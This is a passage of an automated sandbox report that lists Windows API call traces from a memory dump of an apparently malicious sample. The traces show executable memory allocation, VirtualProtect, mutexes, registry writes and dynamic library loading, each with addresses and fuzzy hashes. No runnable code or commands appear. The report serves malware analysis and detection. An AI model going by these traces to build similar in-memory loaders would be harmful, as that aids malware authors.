                                                              • Part of subcall function 0456CDCB: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE88
                                                            • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 04578880
                                                            • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04578889
                                                              • Part of subcall function 04578D4F: CreateMutexA.KERNEL32(0458C1A8,00000000,?,?,0457879F,?,?,00000000,?,?,?), ref: 04578D7F
                                                            • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 045788A4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                                                            • String ID:
                                                            • API String ID: 1700416623-0
                                                            • Opcode ID: 3e168a4373c3833c7ae1e7728608cf7a2d57e4f62757d9d3e1882cc5b64a9d15
                                                            • Instruction ID: 51e23fda43a74285ddfd6691212f9ac301269628f5bcf4ee103f5c0f84cca631
                                                            • Opcode Fuzzy Hash: 3e168a4373c3833c7ae1e7728608cf7a2d57e4f62757d9d3e1882cc5b64a9d15
                                                            • Instruction Fuzzy Hash: FE318971A00205EFCB11AF75EC8496E7BF9FB84394B14447AE811E7390DA38AC04FB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 04570615
                                                              • Part of subcall function 0457B54C: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,0456138B,00000000,0458C16C,00000000), ref: 0457B572
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,04561C48,00000000), ref: 04570657
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 045706A9
                                                            • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,04561C48,00000000), ref: 045706C2
                                                              • Part of subcall function 04583CDF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04583D00
                                                              • Part of subcall function 04583CDF: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,04570648,00000000,00000000,00000000,00000001,?,00000000), ref: 04583D43
                                                            • GetLastError.KERNEL32(?,00000000,04561C48,00000000), ref: 045706FA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                                                            • String ID:
                                                            • API String ID: 1921436656-0
                                                            • Opcode ID: e3a0b9f78941b61d820d20448fa4f55f7f69494811f0e60097df83fa9cfa0e26
                                                            • Instruction ID: ab4a04efe2e8e31108697ec464c88ab14b5b8a65c60685938011fb82027c80e4
                                                            • Opcode Fuzzy Hash: e3a0b9f78941b61d820d20448fa4f55f7f69494811f0e60097df83fa9cfa0e26
                                                            • Instruction Fuzzy Hash: 1E311271A00205EFDF11EF55E890AAE7BB9FB44750F104069E905FB281DB74AD44EF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0457D702
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 0457D71B
                                                            • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0457D728
                                                            • lstrlen.KERNEL32(0458D3A4,?,?,?,?,?,00000000,00000000,?), ref: 0457D73A
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 0457D76B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                                                            • String ID:
                                                            • API String ID: 2734445380-0
                                                            • Opcode ID: 2c471cb2a4a428f12a050886ef741263ce49c30be1e6c44d9e05bc3ba9783c08
                                                            • Instruction ID: 855ea6cfe8c8654bb04d8775500e24133cc02f9983fe146a18fc61d7a5061af2
                                                            • Opcode Fuzzy Hash: 2c471cb2a4a428f12a050886ef741263ce49c30be1e6c44d9e05bc3ba9783c08
                                                            • Instruction Fuzzy Hash: 4F317071500209FFDB11DF95EC88EEA7BB8FF45314F104428F815A6240EB38E919EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04574211: RtlEnterCriticalSection.NTDLL(0458C328), ref: 04574219
                                                              • Part of subcall function 04574211: RtlLeaveCriticalSection.NTDLL(0458C328), ref: 0457422E
                                                              • Part of subcall function 04574211: InterlockedIncrement.KERNEL32(0000001C), ref: 04574247
                                                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0456D2C7
                                                            • memcpy.NTDLL(00000000,?,?), ref: 0456D2D8
                                                            • lstrcmpi.KERNEL32(00000002,?), ref: 0456D31E
                                                            • memcpy.NTDLL(00000000,?,?), ref: 0456D332
                                                            • HeapFree.KERNEL32(00000000,00000000,?), ref: 0456D378
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                                                            • String ID:
                                                            • API String ID: 733514052-0
                                                            • Opcode ID: 925a34b79ad2749891a3e59e64360a4f9b702ab09f9dba3653cd10a449166b30
                                                            • Instruction ID: 528f64ca81443994e4054c2f13057ad5679830bc5129339a45df69937b07618d
                                                            • Opcode Fuzzy Hash: 925a34b79ad2749891a3e59e64360a4f9b702ab09f9dba3653cd10a449166b30
                                                            • Instruction Fuzzy Hash: CA31B971A00215FFDB119FA8EC84A9E7BB9FB05358F144429F506E7200DB39ED48EB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04565D0B: lstrlen.KERNEL32(00000000,00000000,?,00000000,04574F14,00000000,00000000,00000000,?,04571CF2,00000000,00000000,00000000,00000000), ref: 04565D17
                                                            • RtlEnterCriticalSection.NTDLL(0458C328), ref: 0457D552
                                                            • RtlLeaveCriticalSection.NTDLL(0458C328), ref: 0457D565
                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0457D576
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 0457D5E1
                                                            • InterlockedIncrement.KERNEL32(0458C33C), ref: 0457D5F8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                                                            • String ID:
                                                            • API String ID: 3915436794-0
                                                            • Opcode ID: 9b89a91944c4c50f526e997fbc79e1e99d25994a50e3c7b76ae0e3a44d10a1fd
                                                            • Instruction ID: c472e2b95a5b94031162d43538e6584fa7f344d46f10b3b8b8fda62f435c55da
                                                            • Opcode Fuzzy Hash: 9b89a91944c4c50f526e997fbc79e1e99d25994a50e3c7b76ae0e3a44d10a1fd
                                                            • Instruction Fuzzy Hash: EA316D31604706DBDB21DF18E84492AB7F5FF44325B14452DF85A93250DF35E81AEBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(?,?,00000000,00000000,0457228F,00000000,73BCF5B0,0456824E,?,00000001), ref: 0457D9CF
                                                            • LoadLibraryA.KERNEL32(?), ref: 0457D9E4
                                                            • LoadLibraryA.KERNEL32(?), ref: 0457DA00
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0457DA15
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0457DA29
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: LibraryLoad$AddressProc
                                                            • String ID:
                                                            • API String ID: 1469910268-0
                                                            • Opcode ID: 6883b135fe94139c757b71887f7f3f0d3b995def4d3ff1427d06eeae86b67e5c
                                                            • Instruction ID: bacc6beba9e8155557c8fc307943bfd38260b1beb927264977655c28e49d76b3
                                                            • Opcode Fuzzy Hash: 6883b135fe94139c757b71887f7f3f0d3b995def4d3ff1427d06eeae86b67e5c
                                                            • Instruction Fuzzy Hash: DF312772A00205DFD702DF69E8C1A5673F8FB49714B04612DE608FB351DA38BC0DAB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000), ref: 045790FF
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579118
                                                              • Part of subcall function 045790ED: GetCurrentThreadId.KERNEL32 ref: 04579125
                                                              • Part of subcall function 045790ED: GetSystemTimeAsFileTime.KERNEL32(0456EE33,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579131
                                                              • Part of subcall function 045790ED: GetTempFileNameA.KERNEL32(00000000,00000000,0456EE33,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?), ref: 0457913F
                                                              • Part of subcall function 045790ED: lstrcpy.KERNEL32(00000000), ref: 04579161
                                                            • DeleteFileA.KERNEL32(00000000,000004D2), ref: 0456A4C4
                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0456A4CD
                                                            • GetLastError.KERNEL32 ref: 0456A4D7
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0456A596
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 3543646443-0
                                                            • Opcode ID: 918661f9a07f2d6760da1b97c7a4a2914f32d62c354659eb6ade9658baab0bf6
                                                            • Instruction ID: 67879b14ac845af4977d311f6731f663da88e5be203596ddf67af381679ba6a2
                                                            • Opcode Fuzzy Hash: 918661f9a07f2d6760da1b97c7a4a2914f32d62c354659eb6ade9658baab0bf6
                                                            • Instruction Fuzzy Hash: 30216272501111EBD711BBA5FC88E9733ADFF86218B045125FA05E7145DE28FA08F770
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 045781D1: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04572283,00000000,73BCF5B0,0456824E,?,00000001), ref: 045781DD
                                                              • Part of subcall function 045781D1: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 045781F3
                                                              • Part of subcall function 045781D1: _snwprintf.NTDLL ref: 04578218
                                                              • Part of subcall function 045781D1: CreateFileMappingW.KERNEL32(000000FF,0458C1A8,00000004,00000000,00001000,?), ref: 04578234
                                                              • Part of subcall function 045781D1: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04578246
                                                              • Part of subcall function 045781D1: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 0457827E
                                                            • UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04572283,00000000,73BCF5B0,0456824E,?,00000001), ref: 0456D9EE
                                                            • CloseHandle.KERNEL32(?), ref: 0456D9F7
                                                            • SetEvent.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04572283,00000000,73BCF5B0,0456824E,?,00000001), ref: 0456DA3E
                                                            • GetLastError.KERNEL32(0456A8B7,00000000,00000000), ref: 0456DA6D
                                                            • CloseHandle.KERNEL32(00000000,0456A8B7,00000000,00000000), ref: 0456DA7D
                                                              • Part of subcall function 0456A20E: lstrlenW.KERNEL32(?,?,00000000,73B74D40,?,?,04581C44,?,73B74D40), ref: 0456A21A
                                                              • Part of subcall function 0456A20E: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,04581C44,?,73B74D40), ref: 0456A242
                                                              • Part of subcall function 0456A20E: memset.NTDLL ref: 0456A254
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                                                            • String ID:
                                                            • API String ID: 1106445334-0
                                                            • Opcode ID: 0fb6ad1e338cb3b1b6aa1eafdd8e57bd772fd041f661fd1a58fc0d471fb611c8
                                                            • Instruction ID: 4c5f25ec0fa4eca52d553df8e1933422466bcc4cfd6be187337578639b0feade
                                                            • Opcode Fuzzy Hash: 0fb6ad1e338cb3b1b6aa1eafdd8e57bd772fd041f661fd1a58fc0d471fb611c8
                                                            • Instruction Fuzzy Hash: 54214775608205EBEB11EFB4EC45B5A77B9FF84264B010829E946E3250EB25FD09EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,04575A38,00000000,?,?), ref: 04575F1A
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,04575A38,00000000,?,?,?,?,00000000,0456DBFF,?,?,?,?), ref: 04575F2A
                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,04575A38,00000000,?,?,?,?,00000000,0456DBFF), ref: 04575F56
                                                            • GetLastError.KERNEL32(?,?,04575A38,00000000,?,?,?,?,00000000,0456DBFF,?,?,?,?,00000000,?), ref: 04575F7B
                                                            • CloseHandle.KERNEL32(000000FF,?,?,04575A38,00000000,?,?,?,?,00000000,0456DBFF,?,?,?,?,00000000), ref: 04575F8C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$CloseCreateErrorHandleLastReadSize
                                                            • String ID:
                                                            • API String ID: 3577853679-0
                                                            • Opcode ID: 0d4cdeb688cb105fcda08e5068a5646a9b53ca11a6763fee4e31b939c922d461
                                                            • Instruction ID: 78f3e5fb4fbfac9fd6293c7e6a5d05186d1c6ad849a68811e74ba633dd536daa
                                                            • Opcode Fuzzy Hash: 0d4cdeb688cb105fcda08e5068a5646a9b53ca11a6763fee4e31b939c922d461
                                                            • Instruction Fuzzy Hash: 2311B7B210021DFFDB205F64FC84AAE7B6DFB45790F414539F915A7190EA71BD40A6A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • StrChrA.SHLWAPI(?,0000002C), ref: 04576E63
                                                            • StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 04576E7C
                                                            • StrTrimA.SHLWAPI(?,?), ref: 04576EA4
                                                            • StrTrimA.SHLWAPI(00000000,?), ref: 04576EB3
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 04576EEA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Trim$FreeHeap
                                                            • String ID:
                                                            • API String ID: 2132463267-0
                                                            • Opcode ID: 308a2b8edc3a091b0432ec372e50b9119c591a8ea641deaa17c6007bc660816d
                                                            • Instruction ID: 0d240efc95b629a47487c841a36914ac48903d971b0850b47c8512e8cc5038b5
                                                            • Opcode Fuzzy Hash: 308a2b8edc3a091b0432ec372e50b9119c591a8ea641deaa17c6007bc660816d
                                                            • Instruction Fuzzy Hash: AC119372600606BBD7219AA9EC85F9B7BACFB44760F041035FE04EB241DF64FC05A7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,0042B5A8,00000000,04561C48,?,?,?,0456CC9A,73B75520,?,0457070F,00000000,00000000), ref: 045775A4
                                                            • VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,?,0456CC9A,73B75520,?,0457070F,00000000,00000000,?,00000000,04561C48,00000000), ref: 045775D4
                                                            • RtlEnterCriticalSection.NTDLL(0458C300), ref: 045775E3
                                                            • RtlLeaveCriticalSection.NTDLL(0458C300), ref: 04577601
                                                            • GetLastError.KERNEL32(?,0456CC9A,73B75520,?,0457070F,00000000,00000000,?,00000000,04561C48,00000000), ref: 04577611
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                            • String ID:
                                                            • API String ID: 653387826-0
                                                            • Opcode ID: 5474052db239fece9d5c2856b52ae8f8cb832340fc3b4d050afc17efc77be2ff
                                                            • Instruction ID: 9102b8f4fbadb20613197245c6ec6418c31560c14f6ace1748a7ac9abf51f8a0
                                                            • Opcode Fuzzy Hash: 5474052db239fece9d5c2856b52ae8f8cb832340fc3b4d050afc17efc77be2ff
                                                            • Instruction Fuzzy Hash: F521F8B5600706EFD721DFA9E98495ABBF8FB08300B004669EA56A3710DB74F904EB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 0456912E
                                                            • GetLastError.KERNEL32 ref: 04569151
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04569164
                                                            • GetLastError.KERNEL32 ref: 0456916F
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 045691B7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 1671499436-0
                                                            • Opcode ID: 85955fb5da146fbda53bdd4ed99f0ec39a11f59f336ef046e5a6e0ca1931dba9
                                                            • Instruction ID: 650040a568aab941d896706236f3aeda0e7976adb84d9281098daf9d2038f7a0
                                                            • Opcode Fuzzy Hash: 85955fb5da146fbda53bdd4ed99f0ec39a11f59f336ef046e5a6e0ca1931dba9
                                                            • Instruction Fuzzy Hash: 40216FB0500244EBEB218F55ED8CB6A7BB9FB40359F701418E113A65A0DB75BE88FF10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0456C55B
                                                            • memcpy.NTDLL(00000000,0456F989,?,?,-00000005,?,0456F989,00000001,00000000,-00000005,00000001), ref: 0456C584
                                                            • RegSetValueExA.ADVAPI32(?,00000001,00000000,00000003,00000000,?), ref: 0456C5AD
                                                            • RegSetValueExA.ADVAPI32(?,00000001,00000000,00000003,00000000,00000000,-00000005,?,0456F989,00000001,00000000,-00000005,00000001), ref: 0456C5CD
                                                            • RegCloseKey.ADVAPI32(?,?,0456F989,00000001,00000000,-00000005,00000001), ref: 0456C5D8
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Value$AllocateCloseCreateHeapmemcpy
                                                            • String ID:
                                                            • API String ID: 2954810647-0
                                                            • Opcode ID: ff6f4c534a74a23c4dcff3c6b9e596bb8c324c69f17e24a9b18c0818ba99bdfd
                                                            • Instruction ID: a4433acd5b6368abab990e8db649288089e986dc897b3363a1a722998cfc8b2a
                                                            • Opcode Fuzzy Hash: ff6f4c534a74a23c4dcff3c6b9e596bb8c324c69f17e24a9b18c0818ba99bdfd
                                                            • Instruction Fuzzy Hash: B4118676200209FFDB126E64EC44EBA776EFB94751F440129FD02A3160EE71AE20B761
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(04568E44,?,?,?,?,00000008,04568E44,00000000,?,?,0456EE33,?,?,00000000,0457227C,00000000), ref: 0457ED2B
                                                            • memcpy.NTDLL(04568E44,?,00000009,?,?,?,?,00000008,04568E44,00000000,?,?,0456EE33,?,?,00000000), ref: 0457ED4D
                                                            • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 0457ED65
                                                            • lstrlenW.KERNEL32(00000000,00000001,04568E44,?,?,?,?,?,?,?,00000008,04568E44,00000000,?,?,0456EE33), ref: 0457ED85
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,04568E44,00000000,?), ref: 0457EDAA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 3065863707-0
                                                            • Opcode ID: f86f5cc967b076f5f566dff2382e8da08a379e9f54f617e87cbf5331a4fba6c7
                                                            • Instruction ID: 82df392957a7e8c3927e340566ff54e8df9bd10a274dcc05c05059072c028422
                                                            • Opcode Fuzzy Hash: f86f5cc967b076f5f566dff2382e8da08a379e9f54f617e87cbf5331a4fba6c7
                                                            • Instruction Fuzzy Hash: C9119635900208FBCB119B95EC49FDE7BBCFB48750F008069F915E7281DA74EA08EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrcmpi.KERNEL32(00000000,?), ref: 0457B8C4
                                                            • RtlEnterCriticalSection.NTDLL(0458C328), ref: 0457B8D1
                                                            • RtlLeaveCriticalSection.NTDLL(0458C328), ref: 0457B8E4
                                                            • lstrcmpi.KERNEL32(0458C340,00000000), ref: 0457B904
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0456447E,00000000), ref: 0457B918
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                                                            • String ID:
                                                            • API String ID: 1266740956-0
                                                            • Opcode ID: eacb7cbfca1de477c768608889c6d5fd4771fb63fb3c2a66ea5df262ecfa84a4
                                                            • Instruction ID: 0ab612749baa27770514ab1777d03c21c7d798806462794d5d25048f33e1e49c
                                                            • Opcode Fuzzy Hash: eacb7cbfca1de477c768608889c6d5fd4771fb63fb3c2a66ea5df262ecfa84a4
                                                            • Instruction Fuzzy Hash: 7F118131900209EFDB15DF58E889A5AB7F8FB04329F04416DE419E3241DF38FD05ABA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000008,04569999,00000000,?,00000000,73B75520,00000000,?,04577991,?,?,?,00000000), ref: 0457544A
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0457546E
                                                            • StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,04577991,?,?,?,00000000,?,00000000,00000000), ref: 04575475
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 045754BD
                                                            • lstrcat.KERNEL32(00000000,?), ref: 045754CC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 2616531654-0
                                                            • Opcode ID: 658a7a30ee73d424532367f2b4c33c2ec50bcb83845b6928c09e0e2600d24cbb
                                                            • Instruction ID: da3b07d7254b7aa2735ef5daf8f8897d044830357b8e76d5b368154288d352a1
                                                            • Opcode Fuzzy Hash: 658a7a30ee73d424532367f2b4c33c2ec50bcb83845b6928c09e0e2600d24cbb
                                                            • Instruction Fuzzy Hash: 0511A33224031AABD3208B65E888F2B77EDFB84701F04802CF605E3540EF29F819A725
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04565D0B: lstrlen.KERNEL32(00000000,00000000,?,00000000,04574F14,00000000,00000000,00000000,?,04571CF2,00000000,00000000,00000000,00000000), ref: 04565D17
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 045624F8
                                                            • memcpy.NTDLL(00000000,?,?), ref: 0456250B
                                                            • RtlEnterCriticalSection.NTDLL(0458C328), ref: 0456251C
                                                            • RtlLeaveCriticalSection.NTDLL(0458C328), ref: 04562531
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04562569
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 2349942465-0
                                                            • Opcode ID: b28e459347d8bddd2f1f29b06a76369fd2fe7960e4bbcf72a74eb489c95d2237
                                                            • Instruction ID: 3900290ab5688eb79b5d5c11cf21a3c5ae4d5adb05ee52cb1c8476229572446f
                                                            • Opcode Fuzzy Hash: b28e459347d8bddd2f1f29b06a76369fd2fe7960e4bbcf72a74eb489c95d2237
                                                            • Instruction Fuzzy Hash: FC11C676100211EFD7216F28EC84D2A7BADFB85326B01016DF41767241DE25BC0AFB71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(?,00000000,?,?,?,045623D0,?,?,00000000), ref: 0457D4AC
                                                            • lstrlen.KERNEL32(?,?,?,?,045623D0,?,?,00000000), ref: 0457D4B3
                                                            • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 0457D4C1
                                                              • Part of subcall function 0457F3A1: GetLocalTime.KERNEL32(00000000,00000000), ref: 0457F3AB
                                                              • Part of subcall function 0457F3A1: wsprintfA.USER32 ref: 0457F3DE
                                                            • wsprintfA.USER32 ref: 0457D4E3
                                                              • Part of subcall function 0457A8BA: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,0457D50B,00000000,?,00000000,00000000,00000006,00000000), ref: 0457A8D8
                                                              • Part of subcall function 0457A8BA: wsprintfA.USER32 ref: 0457A8FD
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,00000000), ref: 0457D514
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                                                            • String ID:
                                                            • API String ID: 3847261958-0
                                                            • Opcode ID: c5c7b9b0d121857e19cc64b337497fec115dc78d4408261f6ca5353dd2f6bd03
                                                            • Instruction ID: ea24486d33c25d82808d912c5676cc9c267245a669c7e230470ec236a05bba76
                                                            • Opcode Fuzzy Hash: c5c7b9b0d121857e19cc64b337497fec115dc78d4408261f6ca5353dd2f6bd03
                                                            • Instruction Fuzzy Hash: B2016132100219FBDB112F66EC44EAB7F6DFF84364B004025FD19A6212DA3AAD59FF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 0456DACE
                                                              • Part of subcall function 0456F461: wcstombs.NTDLL ref: 0456F51F
                                                            • lstrlen.KERNEL32(?,?,?,?,?,04562FA8,?,?), ref: 0456DAF1
                                                            • lstrlen.KERNEL32(?,?,?,?,04562FA8,?,?), ref: 0456DAFB
                                                            • memcpy.NTDLL(?,?,00004000,?,?,04562FA8,?,?), ref: 0456DB0C
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,04562FA8,?,?), ref: 0456DB2E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heaplstrlen$AllocateFreememcpywcstombs
                                                            • String ID:
                                                            • API String ID: 1256246205-0
                                                            • Opcode ID: b3c9ada2f4f30a02e0f305f729887b5b1851d62c58fb38e6e5439d4caf3d20d3
                                                            • Instruction ID: 02b27e3958faf89c999cae278ae2fe5bcdbcbe7672087d28c4ca9d84b1487f62
                                                            • Opcode Fuzzy Hash: b3c9ada2f4f30a02e0f305f729887b5b1851d62c58fb38e6e5439d4caf3d20d3
                                                            • Instruction Fuzzy Hash: EA118B72600204EFCB109F55EC44F5ABBB9FB85324F204428E906A3260EA31EE08FB24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
